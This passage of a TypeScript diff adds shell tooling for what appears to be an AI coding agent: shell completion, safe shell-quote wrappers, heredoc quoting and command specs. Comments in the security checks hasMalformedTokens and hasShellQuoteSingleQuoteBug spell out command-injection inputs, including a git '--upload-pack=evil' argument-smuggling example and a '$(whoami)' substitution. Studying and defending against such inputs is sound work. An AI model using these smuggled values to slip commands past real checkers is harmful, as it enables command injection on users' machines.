// memoizeWithLRU with the command name itself as the cache key.
export const getCommandSpec = memoizeWithLRU(
  async (command: string): Promise<CommandSpec | null> => {
    const bundled = specs.find(candidate => candidate.name === command)
    if (bundled) return bundled
    return (await loadFigSpec(command)) || null
  },
  (command: string) => command,
)
|
||||
@@ -0,0 +1,259 @@
|
||||
import type { SuggestionItem } from 'src/components/PromptInput/PromptInputFooterSuggestions.js'
|
||||
import {
|
||||
type ParseEntry,
|
||||
quote,
|
||||
tryParseShellCommand,
|
||||
} from '../bash/shellQuote.js'
|
||||
import { logForDebugging } from '../debug.js'
|
||||
import { getShellType } from '../localInstaller.js'
|
||||
import * as Shell from '../Shell.js'
|
||||
|
||||
// Constants

/** Upper bound on the number of completion suggestions returned. */
const MAX_SHELL_COMPLETIONS = 15

/** Timeout, in milliseconds, passed to the shell when running a completion command. */
const SHELL_COMPLETION_TIMEOUT_MS = 1000

/** Operators after which a new command is expected. */
const COMMAND_OPERATORS = ['|', '||', '&&', ';'] as const

/** Kind of thing being completed at the cursor. */
export type ShellCompletionType = 'command' | 'variable' | 'file'

/** Result of analysing the text before the cursor. */
type InputContext = {
  /** Partial word to complete (may be empty). */
  prefix: string
  /** What kind of completion applies to `prefix`. */
  completionType: ShellCompletionType
}
|
||||
|
||||
/**
 * Tells whether a parsed token is one of the command operators
 * (|, ||, &&, ;).
 *
 * @param token A token produced by the shell parser
 * @returns true only for operator objects whose `op` is in COMMAND_OPERATORS
 */
function isCommandOperator(token: ParseEntry): boolean {
  // Plain strings and objects without an `op` field are never operators
  if (typeof token !== 'object' || token === null || !('op' in token)) {
    return false
  }
  const operators: readonly string[] = COMMAND_OPERATORS
  return operators.includes(token.op as string)
}
|
||||
|
||||
/**
 * Classifies a prefix by its characters alone, ignoring surrounding context.
 *
 * - starts with `$`                          -> 'variable'
 * - contains `/`, or starts with `~` or `.`  -> 'file'
 * - anything else (including '')             -> 'command'
 */
function getCompletionTypeFromPrefix(prefix: string): ShellCompletionType {
  if (prefix.startsWith('$')) {
    return 'variable'
  }

  const looksLikePath =
    prefix.includes('/') || prefix.startsWith('~') || prefix.startsWith('.')
  return looksLikePath ? 'file' : 'command'
}
|
||||
|
||||
/**
 * Locates the right-most plain-string token in a parsed token list.
 *
 * @param tokens Parsed tokens (strings and operator/glob/comment objects)
 * @returns The token and its index, or null when no token is a string
 */
function findLastStringToken(
  tokens: ParseEntry[],
): { token: string; index: number } | null {
  for (let index = tokens.length - 1; index >= 0; index--) {
    const candidate = tokens[index]
    if (typeof candidate === 'string') {
      return { token: candidate, index }
    }
  }
  return null
}
|
||||
|
||||
/**
 * Decides whether the token at `currentTokenIndex` sits where a new command
 * is expected: at the very start of the input, or directly after a command
 * operator.
 *
 * @param tokens Parsed tokens
 * @param currentTokenIndex Index of the token being completed
 */
function isNewCommandContext(
  tokens: ParseEntry[],
  currentTokenIndex: number,
): boolean {
  if (currentTokenIndex === 0) {
    return true
  }

  const preceding = tokens[currentTokenIndex - 1]
  if (preceding === undefined) {
    return false
  }
  return isCommandOperator(preceding)
}
|
||||
|
||||
/**
 * Parse input to extract completion context
 *
 * Looks only at the text before the cursor and decides which partial word
 * (`prefix`) is being completed and what kind of completion applies.
 *
 * @param input Full input line
 * @param cursorOffset Cursor position within `input`
 * @returns The prefix to complete (possibly empty) and its completion type
 */
function parseInputContext(input: string, cursorOffset: number): InputContext {
  const beforeCursor = input.slice(0, cursorOffset)

  // Check if it's a variable prefix, before expanding with shell-quote
  const varMatch = beforeCursor.match(/\$[a-zA-Z_][a-zA-Z0-9_]*$/)
  if (varMatch) {
    return { prefix: varMatch[0], completionType: 'variable' }
  }

  // Parse with shell-quote
  const parseResult = tryParseShellCommand(beforeCursor)
  if (!parseResult.success) {
    // Fallback to simple whitespace splitting
    const words = beforeCursor.split(/\s+/)
    const prefix = words[words.length - 1] || ''
    const isFirstToken = words.length === 1 && !beforeCursor.includes(' ')
    const completionType = isFirstToken
      ? 'command'
      : getCompletionTypeFromPrefix(prefix)
    return { prefix, completionType }
  }

  const tokens = parseResult.tokens

  // If the text before the cursor ends with a command operator (e.g. `ls |`),
  // the cursor is not inside any word: a new command is about to start.
  // Returning the previous word here would offer completions for the wrong
  // token.
  const finalEntry = tokens[tokens.length - 1]
  if (finalEntry !== undefined && isCommandOperator(finalEntry)) {
    return { prefix: '', completionType: 'command' }
  }

  // Extract current token
  const lastToken = findLastStringToken(tokens)
  if (!lastToken) {
    // No string token at all: default to command completion
    return { prefix: '', completionType: 'command' }
  }

  // If there's a trailing space, the user is starting a new argument
  if (beforeCursor.endsWith(' ')) {
    // After a word followed by a space = file argument expected
    return { prefix: '', completionType: 'file' }
  }

  // Determine completion type from the prefix itself
  const baseType = getCompletionTypeFromPrefix(lastToken.token)

  // If it's clearly a file or variable based on prefix, use that type
  if (baseType === 'variable' || baseType === 'file') {
    return { prefix: lastToken.token, completionType: baseType }
  }

  // For command-like tokens, check context: are we starting a new command?
  const completionType = isNewCommandContext(tokens, lastToken.index)
    ? 'command'
    : 'file' // Not after operator = file argument

  return { prefix: lastToken.token, completionType }
}
|
||||
|
||||
/**
 * Generate bash completion command using compgen
 *
 * Every invocation passes `--` before the (quoted) prefix so that a prefix
 * beginning with `-` (e.g. `-d`) is treated as the word to complete rather
 * than being parsed as a compgen option.
 *
 * @param prefix Partial word to complete
 * @param completionType Which compgen action to use
 * @returns A bash command line that prints one candidate per line
 */
function getBashCompletionCommand(
  prefix: string,
  completionType: ShellCompletionType,
): string {
  if (completionType === 'variable') {
    // Variable completion - remove $ prefix
    const varName = prefix.slice(1)
    return `compgen -v -- ${quote([varName])} 2>/dev/null`
  } else if (completionType === 'file') {
    // File completion with trailing slash for directories and trailing space for files
    // Use 'while read' to prevent command injection from filenames containing newlines
    return `compgen -f -- ${quote([prefix])} 2>/dev/null | head -${MAX_SHELL_COMPLETIONS} | while IFS= read -r f; do [ -d "$f" ] && echo "$f/" || echo "$f "; done`
  } else {
    // Command completion
    return `compgen -c -- ${quote([prefix])} 2>/dev/null`
  }
}
|
||||
|
||||
/**
 * Builds the zsh command line that lists completion candidates, using
 * native zsh parameter/glob features.
 *
 * @param prefix Partial word to complete
 * @param completionType Which kind of candidates to list
 * @returns A zsh command line that prints one candidate per line
 */
function getZshCompletionCommand(
  prefix: string,
  completionType: ShellCompletionType,
): string {
  switch (completionType) {
    case 'variable': {
      // Drop the leading `$`, then filter the keys of `parameters` by
      // pattern (zsh pattern matching for safe filtering)
      const varName = prefix.slice(1)
      return `print -rl -- \${(k)parameters[(I)${quote([varName])}*]} 2>/dev/null`
    }
    case 'file':
      // Trailing slash marks directories, trailing space marks files.
      // Note: zsh glob expansion is safe from command injection (unlike bash for-in loops)
      return `for f in ${quote([prefix])}*(N[1,${MAX_SHELL_COMPLETIONS}]); do [[ -d "$f" ]] && echo "$f/" || echo "$f "; done`
    default:
      // Command completion: filter the keys of `commands` by pattern
      return `print -rl -- \${(k)commands[(I)${quote([prefix])}*]} 2>/dev/null`
  }
}
|
||||
|
||||
/**
 * Runs the completion command for the given shell and converts its output
 * into suggestion items.
 *
 * @param shellType Shell whose completion syntax is used to build the command
 * @param prefix Partial word to complete
 * @param completionType Kind of completion; copied into each item's metadata
 * @param abortSignal Passed through to the shell execution
 * @returns Up to MAX_SHELL_COMPLETIONS items, one per non-blank output line
 */
async function getCompletionsForShell(
  shellType: 'bash' | 'zsh',
  prefix: string,
  completionType: ShellCompletionType,
  abortSignal: AbortSignal,
): Promise<SuggestionItem[]> {
  let command: string
  switch (shellType) {
    case 'bash':
      command = getBashCompletionCommand(prefix, completionType)
      break
    case 'zsh':
      command = getZshCompletionCommand(prefix, completionType)
      break
    default:
      // Unsupported shell type
      return []
  }

  const shellCommand = await Shell.exec(command, abortSignal, 'bash', {
    timeout: SHELL_COMPLETION_TIMEOUT_MS,
  })
  const { stdout } = await shellCommand.result

  const suggestions: SuggestionItem[] = []
  for (const line of stdout.split('\n') as string[]) {
    // Skip blank lines; stop once the cap is reached
    if (!line.trim()) {
      continue
    }
    if (suggestions.length === MAX_SHELL_COMPLETIONS) {
      break
    }
    suggestions.push({
      id: line,
      displayText: line,
      description: undefined,
      metadata: { completionType },
    })
  }
  return suggestions
}
|
||||
|
||||
/**
 * Produces shell completion suggestions for the word at the cursor.
 * Only bash and zsh are supported (matches Shell.ts execution support);
 * any other shell, an empty prefix, or any failure yields an empty list.
 *
 * @param input Full input line
 * @param cursorOffset Cursor position within `input`
 * @param abortSignal Passed through to the shell execution
 * @returns Suggestions whose metadata carries the completion type and a
 *   snapshot of `input`
 */
export async function getShellCompletions(
  input: string,
  cursorOffset: number,
  abortSignal: AbortSignal,
): Promise<SuggestionItem[]> {
  const shellType = getShellType()

  // Only support bash/zsh (matches Shell.ts execution support)
  if (!(shellType === 'bash' || shellType === 'zsh')) {
    return []
  }

  try {
    const context = parseInputContext(input, cursorOffset)
    if (!context.prefix) {
      return []
    }

    const completions = await getCompletionsForShell(
      shellType,
      context.prefix,
      context.completionType,
      abortSignal,
    )

    // Attach inputSnapshot to every suggestion so we can detect when input changes
    return completions.map(suggestion => {
      const baseMetadata = suggestion.metadata as {
        completionType: ShellCompletionType
      }
      return {
        ...suggestion,
        metadata: { ...baseMetadata, inputSnapshot: input },
      }
    })
  } catch (error) {
    logForDebugging(`Shell completion failed: ${error}`)
    return [] // Silent fail
  }
}
|
||||
@@ -0,0 +1,28 @@
|
||||
import { quote } from './shellQuote.js'
|
||||
|
||||
/**
 * Builds a command line from a shell prefix (an executable path, optionally
 * followed by arguments) and the command it should run.
 *
 * Examples:
 * - "bash" -> quotes as 'bash'
 * - "/usr/bin/bash -c" -> quotes as '/usr/bin/bash' -c
 * - "C:\Program Files\Git\bin\bash.exe -c" -> quotes as 'C:\Program Files\Git\bin\bash.exe' -c
 *
 * @param prefix The shell prefix string containing executable and optional arguments
 * @param command The command to be executed
 * @returns The executable quoted, the arguments verbatim, then the quoted command
 */
export function formatShellPrefixCommand(
  prefix: string,
  command: string,
): string {
  // The executable ends at the LAST " -" in the prefix; everything after
  // that space is passed through unquoted as arguments.
  // NOTE(review): with several flags (e.g. "bash -l -c") the earlier flags
  // land inside the quoted executable — confirm prefixes carry a single flag.
  const splitAt = prefix.lastIndexOf(' -')

  if (splitAt <= 0) {
    // No argument section: the whole prefix is the executable
    return `${quote([prefix])} ${quote([command])}`
  }

  const execPath = prefix.slice(0, splitAt)
  const args = prefix.slice(splitAt + 1)
  return `${quote([execPath])} ${args} ${quote([command])}`
}
|
||||
@@ -0,0 +1,304 @@
|
||||
/**
|
||||
* Safe wrappers for shell-quote library functions that handle errors gracefully
|
||||
* These are drop-in replacements for the original functions
|
||||
*/
|
||||
|
||||
import {
|
||||
type ParseEntry,
|
||||
parse as shellQuoteParse,
|
||||
quote as shellQuoteQuote,
|
||||
} from 'shell-quote'
|
||||
import { logError } from '../log.js'
|
||||
import { jsonStringify } from '../slowOperations.js'
|
||||
|
||||
export type { ParseEntry } from 'shell-quote'
|
||||
|
||||
/** Outcome of parsing a command: the parsed tokens, or an error message. */
export type ShellParseResult =
  | { success: true; tokens: ParseEntry[] }
  | { success: false; error: string }

/** Outcome of quoting arguments: the quoted string, or an error message. */
export type ShellQuoteResult =
  | { success: true; quoted: string }
  | { success: false; error: string }
|
||||
|
||||
/**
 * Non-throwing wrapper around shell-quote's `parse`.
 *
 * @param cmd Command string to parse
 * @param env Optional environment, as a lookup table or a lookup function
 * @returns The tokens on success; on failure the error message (Error
 *   instances are also passed to `logError`)
 */
export function tryParseShellCommand(
  cmd: string,
  env?:
    | Record<string, string | undefined>
    | ((key: string) => string | undefined),
): ShellParseResult {
  try {
    // Both branches make the same call at runtime; the split is presumably
    // there so each shape of `env` resolves against a matching signature.
    if (typeof env === 'function') {
      return { success: true, tokens: shellQuoteParse(cmd, env) }
    }
    return { success: true, tokens: shellQuoteParse(cmd, env) }
  } catch (error) {
    if (!(error instanceof Error)) {
      return { success: false, error: 'Unknown parse error' }
    }
    logError(error)
    return { success: false, error: error.message }
  }
}
|
||||
|
||||
/**
 * Non-throwing, strictly validated wrapper around shell-quote's `quote`.
 *
 * Strings are used as-is; numbers, booleans, null and undefined are
 * stringified; objects, symbols, functions and any other type are rejected.
 *
 * @param args Values to quote
 * @returns The quoted string on success; on failure the error message
 *   (Error instances are also passed to `logError`)
 */
export function tryQuoteShellArgs(args: unknown[]): ShellQuoteResult {
  try {
    const validated: string[] = args.map((arg, index) => {
      // null must be handled before the typeof switch (typeof null is 'object')
      if (arg === null || arg === undefined) {
        return String(arg)
      }

      const type = typeof arg
      switch (type) {
        case 'string':
          return arg as string
        case 'number':
        case 'boolean':
          return String(arg)
        case 'object':
          throw new Error(
            `Cannot quote argument at index ${index}: object values are not supported`,
          )
        case 'symbol':
          throw new Error(
            `Cannot quote argument at index ${index}: symbol values are not supported`,
          )
        case 'function':
          throw new Error(
            `Cannot quote argument at index ${index}: function values are not supported`,
          )
        default:
          throw new Error(
            `Cannot quote argument at index ${index}: unsupported type ${type}`,
          )
      }
    })

    return { success: true, quoted: shellQuoteQuote(validated) }
  } catch (error) {
    if (!(error instanceof Error)) {
      return { success: false, error: 'Unknown quote error' }
    }
    logError(error)
    return { success: false, error: error.message }
  }
}
|
||||
|
||||
/**
 * Reports whether a command, or the tokens shell-quote produced for it,
 * look malformed, which suggests shell-quote misinterpreted the command.
 *
 * Two independent checks:
 *
 * 1. Unterminated quotes in the raw command. shell-quote silently drops an
 *    unmatched `"` or `'` and parses the rest as unquoted, leaving no trace
 *    in the tokens. `echo "hi;evil | cat` (one unmatched `"`) is a bash
 *    syntax error, yet shell-quote yields clean tokens with `;` as an
 *    operator. So the raw string is walked with bash quote semantics.
 *
 * 2. Unbalanced delimiters inside individual string tokens. Ambiguous input
 *    such as `echo {"hi":"hi;evil"}` is parsed with `;` as an operator,
 *    producing fragments like `{hi:"hi` (unbalanced brace). Legitimate
 *    commands produce complete, balanced tokens.
 *
 * Security: This prevents command injection via HackerOne #3482049 where
 * shell-quote's correct parsing of ambiguous input can be exploited.
 *
 * @param command The original command string
 * @param parsed Tokens shell-quote produced for `command`
 * @returns true when either check finds a problem
 */
export function hasMalformedTokens(
  command: string,
  parsed: ParseEntry[],
): boolean {
  // Check 1: walk the raw command. Backslash escapes the next char outside
  // single quotes; there are no escapes inside single quotes.
  let inSingle = false
  let inDouble = false
  let pos = 0
  while (pos < command.length) {
    const ch = command[pos]
    if (ch === '\\' && !inSingle) {
      pos += 2
      continue
    }
    if (ch === '"' && !inSingle) {
      inDouble = !inDouble
    } else if (ch === "'" && !inDouble) {
      inSingle = !inSingle
    }
    pos++
  }
  // A quote state still open at the end means an odd number of quote toggles
  if (inDouble || inSingle) return true

  // Check 2: per-token delimiter balance
  const countMatches = (text: string, pattern: RegExp): number =>
    (text.match(pattern) || []).length

  const delimiterPairs: Array<[RegExp, RegExp]> = [
    [/{/g, /}/g], // curly braces
    [/\(/g, /\)/g], // parentheses
    [/\[/g, /\]/g], // square brackets
  ]

  // Quotes that aren't escaped (preceded by backslash); a token with an odd
  // number of them is malformed.
  const unescapedQuotes: RegExp[] = [
    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by hasCommandSeparator check at caller, runs on short per-token strings
    /(?<!\\)"/g,
    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above
    /(?<!\\)'/g,
  ]

  for (const entry of parsed) {
    if (typeof entry !== 'string') continue

    for (const [opener, closer] of delimiterPairs) {
      if (countMatches(entry, opener) !== countMatches(entry, closer)) {
        return true
      }
    }

    for (const quotePattern of unescapedQuotes) {
      if (countMatches(entry, quotePattern) % 2 !== 0) return true
    }
  }

  return false
}
|
||||
|
||||
/**
 * Detects commands containing '\' patterns that exploit the shell-quote
 * library's incorrect handling of backslashes inside single quotes.
 *
 * In bash, single quotes preserve ALL characters literally - backslash has
 * no special meaning, so '\' is just the string \ (open, \, close). But
 * shell-quote treats \ as an escape character inside single quotes, so for
 * it '\' does NOT close the quoted string. The pattern '\' <payload> '\'
 * therefore hides <payload> from security checks, because shell-quote sees
 * one single-quoted string.
 *
 * @param command Raw command string
 * @returns true when a single-quoted string ends in backslashes in a way
 *   that makes shell-quote and bash disagree about where it closes
 */
export function hasShellQuoteSingleQuoteBug(command: string): boolean {
  // Walk the command with correct bash single-quote semantics
  let inSingleQuote = false
  let inDoubleQuote = false

  for (let pos = 0; pos < command.length; pos++) {
    const ch = command[pos]

    // Outside single quotes a backslash escapes the next character: skip it
    if (ch === '\\' && !inSingleQuote) {
      pos++
      continue
    }

    if (ch === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }

    // Only single quotes outside double quotes matter from here on
    if (ch !== "'" || inDoubleQuote) {
      continue
    }

    inSingleQuote = !inSingleQuote
    if (inSingleQuote) {
      // Just opened a single-quoted string; nothing to inspect yet
      continue
    }

    // Just closed a single-quoted string: inspect its trailing backslashes.
    // shell-quote's chunker regex '((\\'|[^'])*?)' treats \' as an escape
    // sequence inside single quotes while bash treats the backslash as
    // literal, so shell-quote can merge tokens that bash keeps separate.
    //
    // Odd trailing \'s = always a bug:
    //   '\'    -> shell-quote: \' = literal ', still open. bash: \, closed.
    //   'abc\' -> shell-quote: abc then \' = literal ', still open. bash: abc\, closed.
    //   '\\\'  -> shell-quote: \\ + \', still open. bash: \\\, closed.
    //
    // Even trailing \'s = bug ONLY when a later ' exists in the command:
    //   '\\' alone    -> shell-quote backtracks, both parsers agree. OK.
    //   '\\' 'next'   -> shell-quote: \' consumes the closing ', takes the
    //                    next ' as a false close, merges tokens.
    //                    bash: two separate tokens.
    //
    // Detail: the regex alternation tries \' before [^']. For '\\' it matches
    // the first \ via [^'] (next char is \, not '), then the second \ via \'
    // (next char IS '), consuming the closing '. It then reads on until it
    // finds another ' to close the match. If none exists it backtracks to
    // [^'] for the second \ and closes correctly. If a later ' exists (e.g.
    // the opener of the next single-quoted arg), no backtracking occurs and
    // tokens merge. See H1 report:
    //   git ls-remote 'safe\\' '--upload-pack=evil' 'repo'
    //   shell-quote: ["git","ls-remote","safe\\\\ --upload-pack=evil repo"]
    //   bash:        ["git","ls-remote","safe\\\\","--upload-pack=evil","repo"]
    let trailingBackslashes = 0
    for (let k = pos - 1; k >= 0 && command[k] === '\\'; k--) {
      trailingBackslashes++
    }

    if (trailingBackslashes === 0) {
      continue
    }
    if (trailingBackslashes % 2 === 1) {
      return true
    }
    // Even count: ANY later ' can serve as the false closing quote, because
    // the regex doesn't respect bash quote state (a ' inside double quotes
    // is also consumable).
    if (command.includes("'", pos + 1)) {
      return true
    }
  }

  return false
}
|
||||
|
||||
/**
 * Quotes arguments for the shell. Strict validation is tried first; when it
 * rejects the input, a lenient path stringifies each argument (unsupported
 * types via `jsonStringify`) and quotes the resulting strings.
 *
 * @param args Values to quote
 * @returns The shell-quoted string
 * @throws Error when the lenient path fails as well
 */
export function quote(args: ReadonlyArray<unknown>): string {
  // First try the strict validation
  const strict = tryQuoteShellArgs([...args])
  if (strict.success) {
    return strict.quoted
  }

  // Lenient fallback: objects, symbols, functions, etc. are converted to
  // strings first and then quoted like any other string.
  try {
    const stringArgs = args.map(arg => {
      const isSimple =
        arg === null ||
        arg === undefined ||
        ['string', 'number', 'boolean'].includes(typeof arg)

      // For unsupported types, jsonStringify gives a meaningful representation
      // without crashing; the result still goes through shell quoting below.
      return isSimple ? String(arg) : jsonStringify(arg)
    })

    return shellQuoteQuote(stringArgs)
  } catch (error) {
    // SECURITY: Never use JSON.stringify as a fallback for shell quoting.
    // JSON.stringify uses double quotes which don't prevent shell command execution.
    // For example, jsonStringify(['echo', '$(whoami)']) produces "echo" "$(whoami)"
    if (error instanceof Error) {
      logError(error)
    }
    throw new Error('Failed to quote shell arguments safely')
  }
}
|
||||
@@ -0,0 +1,128 @@
|
||||
import { quote } from './shellQuote.js'
|
||||
|
||||
/**
 * Detects if a command contains a heredoc pattern
 * Matches patterns like: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF, etc.
 *
 * Bit-shift expressions (`1 << 2`, `[[ 1 << 2 ]]`, `$(( ... << ... ))`) are
 * not heredocs. They are stripped from the command before the heredoc test,
 * so a bit-shift elsewhere in the command (for example inside the heredoc
 * body) no longer hides a real heredoc.
 *
 * @param command Command string to inspect
 * @returns true when a heredoc operator remains outside bit-shift expressions
 */
function containsHeredoc(command: string): boolean {
  // Remove bit-shift spans; a space is left behind so neighbouring text is
  // not glued together. Arithmetic expansions go first because they may
  // contain the narrower digit<<digit form.
  const withoutBitShifts = command
    .replace(/\$\(\(.*<<.*\)\)/g, ' ')
    .replace(/\[\[\s*\d+\s*<<\s*\d+\s*\]\]/g, ' ')
    .replace(/\d\s*<<\s*\d/g, ' ')

  // Match heredoc patterns: << followed by optional -, then optional quotes or backslash, then word
  // Matches: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF
  const heredocRegex = /<<-?\s*(?:(['"]?)(\w+)\1|\\(\w+))/
  return heredocRegex.test(withoutBitShifts)
}
|
||||
|
||||
/**
 * Detects whether a command contains a quoted string that spans an actual
 * newline.
 *
 * Each pattern matches an opening quote, content made of non-quote
 * characters or backslash escapes (so \' and \" do not end the match), a
 * literal newline, more such content, then the closing quote.
 */
function containsMultilineString(command: string): boolean {
  const multilinePatterns = [
    /'(?:[^'\\]|\\.)*\n(?:[^'\\]|\\.)*'/, // '...\n...'
    /"(?:[^"\\]|\\.)*\n(?:[^"\\]|\\.)*"/, // "...\n..."
  ]
  return multilinePatterns.some(pattern => pattern.test(command))
}
|
||||
|
||||
/**
 * Quotes a shell command appropriately, preserving heredocs and multiline strings
 * @param command The command to quote
 * @param addStdinRedirect Whether to add < /dev/null
 * @returns The properly quoted command
 */
export function quoteShellCommand(
  command: string,
  addStdinRedirect: boolean = true,
): string {
  const hasHeredoc = containsHeredoc(command)

  // Regular commands go through shell-quote
  if (!hasHeredoc && !containsMultilineString(command)) {
    return addStdinRedirect
      ? quote([command, '<', '/dev/null'])
      : quote([command])
  }

  // Heredocs and multiline strings are quoted for eval by hand, because
  // shell-quote incorrectly escapes ! to \! in these cases: wrap in single
  // quotes and escape only the single quotes inside the command.
  const quoted = `'${command.replace(/'/g, "'\"'\"'")}'`

  // Heredocs provide their own input, so they never get a stdin redirect
  if (hasHeredoc || !addStdinRedirect) {
    return quoted
  }
  return `${quoted} < /dev/null`
}
|
||||
|
||||
/**
 * Detects if a command already has a stdin redirect
 * Match patterns like: < file, </path/to/file, < /dev/null, etc.
 * But not <<EOF (heredoc), << (bit shift), or <(process substitution)
 */
export function hasStdinRedirect(command: string): boolean {
  // `<` must sit at the start of the string or after whitespace / a command
  // separator, must not be followed by `<` or `(`, and must be followed
  // (after optional whitespace) by a filename/path.
  const stdinRedirectPattern = /(?:^|[\s;&|])<(?![<(])\s*\S+/
  return stdinRedirectPattern.test(command)
}
|
||||
|
||||
/**
 * Checks if stdin redirect should be added to a command
 * @param command The command to check
 * @returns true if stdin redirect can be safely added
 */
export function shouldAddStdinRedirect(command: string): boolean {
  // Not for heredocs (a redirect interferes with the heredoc terminator) and
  // not when the command already has a stdin redirect; otherwise adding one
  // is generally safe.
  return !containsHeredoc(command) && !hasStdinRedirect(command)
}
|
||||
|
||||
/**
 * Pattern for Windows CMD-style redirects to `nul`.
 *
 * Capture group 1 is the redirect operator with its optional fd digit / `&`
 * and trailing whitespace; `nul` (any letter case) must be followed by
 * whitespace, end of input, or one of `| & ; )`.
 *
 * Matches: `>nul`, `> NUL`, `2>nul`, `&>nul`, `>>nul` (case-insensitive)
 * Does NOT match: `>null`, `>nullable`, `>nul.txt`, `cat nul.txt`
 */
const NUL_REDIRECT_REGEX = /(\d?&?>+\s*)[Nn][Uu][Ll](?=\s|$|[|&;)\n])/g

/**
 * Rewrites Windows CMD-style `>nul` redirects to POSIX `/dev/null`.
 *
 * The model occasionally hallucinates Windows CMD syntax (e.g., `ls 2>nul`)
 * even though our bash shell is always POSIX (Git Bash / WSL on Windows).
 * When Git Bash sees `2>nul`, it creates a literal file named `nul` — a
 * Windows reserved device name that is extremely hard to delete and breaks
 * `git add .` and `git clone`. See anthropics/claude-code#4928.
 *
 * Limitation: the pattern does not parse shell quoting, so `echo ">nul"`
 * will also be rewritten. This is acceptable collateral — it's extremely
 * rare and rewriting to `/dev/null` inside a string is harmless.
 *
 * @param command Command string to rewrite
 * @returns The command with every matching `nul` target replaced
 */
export function rewriteWindowsNullRedirect(command: string): string {
  // `$1` keeps the original redirect operator (and spacing) in place
  const rewritten = command.replace(NUL_REDIRECT_REGEX, '$1/dev/null')
  return rewritten
}
|
||||
@@ -0,0 +1,14 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
/** Spec for `alias`: zero or more `name=value` definitions. */
const alias: CommandSpec = {
  name: 'alias',
  description: 'Create or list command aliases',
  args: {
    name: 'definition',
    description: 'Alias definition in the form name=value',
    isOptional: true,
    isVariadic: true,
  },
}
|
||||
|
||||
export default alias
|
||||
@@ -0,0 +1,18 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
import alias from './alias.js'
|
||||
import nohup from './nohup.js'
|
||||
import pyright from './pyright.js'
|
||||
import sleep from './sleep.js'
|
||||
import srun from './srun.js'
|
||||
import time from './time.js'
|
||||
import timeout from './timeout.js'
|
||||
|
||||
// Command specs bundled with the project, exported as a single list.
export default [
  pyright,
  timeout,
  sleep,
  alias,
  nohup,
  time,
  srun,
] satisfies CommandSpec[]
|
||||
@@ -0,0 +1,13 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
/** Spec for `nohup`: a wrapper whose single argument is the command to run. */
const nohup: CommandSpec = {
  name: 'nohup',
  description: 'Run a command immune to hangups',
  args: {
    name: 'command',
    description: 'Command to run with nohup',
    isCommand: true,
  },
}
|
||||
|
||||
export default nohup
|
||||
@@ -0,0 +1,91 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
/**
 * Spec for the `pyright` CLI: its options, followed by an optional variadic
 * list of files or directories.
 */
export default {
  name: 'pyright',
  description: 'Type checker for Python',
  options: [
    // General
    { name: ['--help', '-h'], description: 'Show help message' },
    { name: '--version', description: 'Print pyright version and exit' },
    {
      name: ['--watch', '-w'],
      description: 'Continue to run and watch for changes',
    },
    {
      name: ['--project', '-p'],
      description: 'Use the configuration file at this location',
      args: { name: 'FILE OR DIRECTORY' },
    },
    { name: '-', description: 'Read file or directory list from stdin' },
    // Stubs and type verification
    {
      name: '--createstub',
      description: 'Create type stub file(s) for import',
      args: { name: 'IMPORT' },
    },
    {
      name: ['--typeshedpath', '-t'],
      description: 'Use typeshed type stubs at this location',
      args: { name: 'DIRECTORY' },
    },
    {
      name: '--verifytypes',
      description: 'Verify completeness of types in py.typed package',
      args: { name: 'IMPORT' },
    },
    {
      name: '--ignoreexternal',
      description: 'Ignore external imports for --verifytypes',
    },
    // Python environment
    {
      name: '--pythonpath',
      description: 'Path to the Python interpreter',
      args: { name: 'FILE' },
    },
    {
      name: '--pythonplatform',
      description: 'Analyze for platform',
      args: { name: 'PLATFORM' },
    },
    {
      name: '--pythonversion',
      description: 'Analyze for Python version',
      args: { name: 'VERSION' },
    },
    {
      name: ['--venvpath', '-v'],
      description: 'Directory that contains virtual environments',
      args: { name: 'DIRECTORY' },
    },
    // Output and diagnostics
    { name: '--outputjson', description: 'Output results in JSON format' },
    { name: '--verbose', description: 'Emit verbose diagnostics' },
    { name: '--stats', description: 'Print detailed performance stats' },
    {
      name: '--dependencies',
      description: 'Emit import dependency information',
    },
    {
      name: '--level',
      description: 'Minimum diagnostic level',
      args: { name: 'LEVEL' },
    },
    {
      name: '--skipunannotated',
      description: 'Skip type analysis of unannotated functions',
    },
    {
      name: '--warnings',
      description: 'Use exit code of 1 if warnings are reported',
    },
    {
      name: '--threads',
      description: 'Use up to N threads to parallelize type checking',
      args: { name: 'N', isOptional: true },
    },
  ],
  args: {
    name: 'files',
    description:
      'Specify files or directories to analyze (overrides config file)',
    isVariadic: true,
    isOptional: true,
  },
} satisfies CommandSpec
|
||||
@@ -0,0 +1,13 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
/** Spec for `sleep`: one required duration argument. */
const sleep: CommandSpec = {
  name: 'sleep',
  description: 'Delay for a specified amount of time',
  args: {
    name: 'duration',
    description: 'Duration to sleep (seconds or with suffix like 5s, 2m, 1h)',
    isOptional: false,
  },
}
|
||||
|
||||
export default sleep
|
||||
@@ -0,0 +1,31 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
/**
 * Spec for `srun`. Declares the task-count (`-n`/`--ntasks`) and node-count
 * (`-N`/`--nodes`) options, each taking one value; the positional argument
 * is flagged `isCommand: true`.
 */
const srun: CommandSpec = {
  name: 'srun',
  description: 'Run a command on SLURM cluster nodes',
  options: [
    {
      name: ['-n', '--ntasks'],
      description: 'Number of tasks',
      args: { name: 'count', description: 'Number of tasks to run' },
    },
    {
      name: ['-N', '--nodes'],
      description: 'Number of nodes',
      args: { name: 'count', description: 'Number of nodes to allocate' },
    },
  ],
  args: {
    name: 'command',
    description: 'Command to run on the cluster',
    isCommand: true,
  },
}
|
||||
|
||||
export default srun
|
||||
@@ -0,0 +1,13 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
/**
 * Spec for `time`: its only argument is flagged `isCommand: true`.
 */
const time: CommandSpec = {
  name: 'time',
  description: 'Time a command',
  args: { name: 'command', description: 'Command to time', isCommand: true },
}
|
||||
|
||||
export default time
|
||||
@@ -0,0 +1,20 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
/**
